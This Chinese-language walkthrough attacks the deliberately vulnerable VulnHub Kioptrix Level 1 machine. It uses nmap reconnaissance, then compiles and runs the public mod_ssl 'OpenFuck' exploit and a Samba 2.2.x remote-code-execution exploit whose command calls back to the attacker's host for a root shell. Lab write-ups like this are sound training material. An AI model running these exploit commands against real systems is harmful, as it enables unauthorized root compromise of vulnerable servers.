环境
准备环境
一台kali攻击机
一台Kioptrix_Level_1 靶机
靶机说明
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kioptrix_Level_1 靶机漏洞存在两个:
1、apache 1.3.20
2、samba 2.2.1a
第一步:探测靶机
用netdiscover工具进行内网主机发现。
Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。
命令如下:
netdiscover -i eth0 -r 192.168.251.0/24
-i:网卡,选择你监控的网卡。比如eth0。
-r:网段,选择你探测的网段。比如192.168.251.0
用nmap进行主机发现
命令如下:
nmap -sn 192.168.251.1-254
-sn:只进行主机发现,不进行端口扫描。
第二步:信息收集
拿到一台目标主机,首先要对其进行信息收集。例如进行端口扫描,以获取主机的端口开放情况和对应的服务信息。
本例中目标主机IP地址为192.168.251.19,攻击主机IP地址为192.168.251.168。
使用nmap进行扫描。命令如下:
nmap -sC -sV -v -p- -A 192.168.251.19
-sC:脚本扫描
-sV:版本扫描
-v:显示详细信息
-p-:指定端口扫描
-A:全面扫描,包含操作系统和服务版本探测等
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 05:13 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating ARP Ping Scan at 05:13
Scanning 192.168.251.19 [1 port]
Completed ARP Ping Scan at 05:13, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:13
Completed Parallel DNS resolution of 1 host. at 05:13, 0.05s elapsed
Initiating SYN Stealth Scan at 05:13
Scanning bogon (192.168.251.19) [65535 ports]
Discovered open port 80/tcp on 192.168.251.19
Discovered open port 111/tcp on 192.168.251.19
Discovered open port 443/tcp on 192.168.251.19
Discovered open port 22/tcp on 192.168.251.19
Discovered open port 139/tcp on 192.168.251.19
Discovered open port 1024/tcp on 192.168.251.19
Completed SYN Stealth Scan at 05:13, 5.11s elapsed (65535 total ports)
Initiating Service scan at 05:13
Scanning 6 services on bogon (192.168.251.19)
Completed Service scan at 05:13, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against bogon (192.168.251.19)
NSE: Script scanning 192.168.251.19.
Initiating NSE at 05:13
Completed NSE at 05:13, 10.61s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.07s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Nmap scan report for bogon (192.168.251.19)
Host is up (0.00079s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: pMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-09-07T09:15:40+00:00; +1m50s from scanner time.
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Supported Methods: GET HEAD POST
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce:5293:4723:e7fe:c28d:74ab:42d7:02f1
|_SHA-1: 9c42:91c3:bed2:a95b:983d:10ac:f766:ecb9:8766:1d33
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:F7:19:CE (VMware)
Device type: general purpose|media device
Running: Linux 2.4.X, Roku embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4 cpe:/h:roku:soundbridge_m1500
OS details: Linux 2.4.9 - 2.4.18 (likely embedded), Roku HD1500 media player
Uptime guess: 0.001 days (since Sat Sep 7 05:12:48 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=191 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| MYGROUP<00> Flags: <group><active>
|_ MYGROUP<1e> Flags: <group><active>
|_clock-skew: 1m49s
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.79 ms bogon (192.168.251.19)
NSE: Script Post-scanning.
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Initiating NSE at 05:13
Completed NSE at 05:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.95 seconds
Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
通过扫描结果可以发现,该机开放了多个常用端口,其中80端口和443端口分别对外提供http和https服务。尝试访问80端口提供的http服务,浏览器访问http://192.168.251.19/,访问结果为apache中间件的默认测试页面。
很多情况下,一个IP下可能运行多个站点,通过不同的端口访问、通过IP地址访问以及通过域名访问获得的结果也可能不尽相同。
22端口:ssh远程登陆端口
80端口:超文本传输协议开放端口
111端口:SUN公司的RPC服务
139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务
443端口:网页浏览端口
1024端口:1024端口是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。
漏洞线索1:Apache中间件
根据信息收集的情报,目标主机Apache中间件版本非常古老,还是Apache 1.3.20版本,这个版本发行日期是2001年。对应的443端口上使用的ssl服务也相当古老,为mod_ssl/2.8.4版本。如果我们访问Exploit Database网站,并以“mod_ssl”为关键字进行漏洞查询,发现mod_ssl/2.8.4存在已知的远程缓冲区溢出漏洞。
这里下载第一个最新的漏洞,下载时留意代码的注释,它们往往会告知代码的使用方法或编译方式
代码下载到本地重新命名为OpenFuck.c,并按照如下代码进行编译。
gcc -o OpenFuck OpenFuck.c -lcrypto
根据前面代码注释已经说明,如果出现编译报错,可以先通过apt-get install libssl-dev命令安装libssl-dev来解决,编译完成获得名为“OpenFuck”的可执行文件。
执行“./OpenFuck”命令,即可获得该执行文件的使用说明。
根据目标主机的操作系统、Apache版本不同选择不同参数,由上述信息收集可知,目标主机运行着RedHat Linux系统,Apache版本1.3.20,满足该条件的参数有两个,分别是0x6a和0x6b。
依次执行如下命令:
./OpenFuck 0x6a 192.168.251.19 443
./OpenFuck 0x6b 192.168.251.19 443
其中0x6a没有得到目标主机响应,而0x6b成功获得响应并取得目标主机的root用户权限。
漏洞线索2:Samba服务
Samba服务版本号未能通过nmap扫描获取,可以通过其他检测方法来确认版本号。例如使用Metasploit再次对Samba服务进行版本检测,在终端输入msfconsole命令启动Metasploit。
输入search smb-version获得专门用来检测Samba服务版本的payload
msfconsole
search smb-version
可以使用“info 编号(#列对应数值)”,“use 编号”或者“use + name列的信息”
通过“show options”命令查看运行所需参数
use 0
show options
根据上述参数选项,我们只需知晓RHOSTS选项即可
set rhost 192.168.251.19
run
通过执行结果,该主机的Samba服务版本号为2.2.1a。
在Exploit Database搜索“Samba 2.2.”关键字,会获得大量exploit信息
本例选用了“Samba < 2.2.8(Linux/BSD)-Remote Code Execution”
下载好本地编译
gcc 10.c -o smb
编译完成后,使用“./smb”命令执行,将显示使用帮助。
./smb
根据我们已知信息及使用帮助构造命令:
./smb -b 0 -c 192.168.251.168 192.168.251.19
至此,通过Samba服务版本出现的漏洞成功获得最高权限。